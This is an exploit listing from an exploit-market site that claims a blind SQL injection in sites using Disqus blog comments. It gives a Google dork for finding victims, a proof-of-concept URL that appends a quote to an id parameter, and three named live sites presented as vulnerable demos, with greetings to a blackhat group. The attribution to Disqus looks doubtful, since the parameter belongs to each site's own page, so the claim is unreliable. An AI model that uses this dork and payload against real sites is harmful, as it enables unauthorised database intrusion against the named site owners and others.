[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Disqus Blog Comments Blind SQL Injection Vulnerability

Author
Spy_w4r3
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19280
Category
web applications
Date add
29-08-2012
Platform
php
:----------------------------------------------------------------------------------------------------------------------------------------:
Blog Comments Powered By Disqus <- Sql Injection
:----------------------------------------------------------------------------------------------------------------------------------------:
 
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Blog Comments Powered By Disqus
: # Date: 28 August 2012
: # Author: Spy_w4r3
: # # Vendor or Software Link: http://disqus.com
: # Category : Web Applications
: # Google dork: inurl:/index.php?id= intext:"Powered by Disqus"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------:
 
# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------:
inurl:/index.php?id= intext:"Powered by Disqus"
 
# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/index.php?id=['SQL]
 
# Demo site:
:----------------------------------------------------------------------------------------------------------------------------------------:
http://fourtales.com/index.php?id=116'
http://blasternation.com/index.php?id=131'
http://www.gogetaroomie.com/index.php?id=298'
 
# Credits
:----------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianblackhat.web.id



#  0day.today [2024-12-24]  #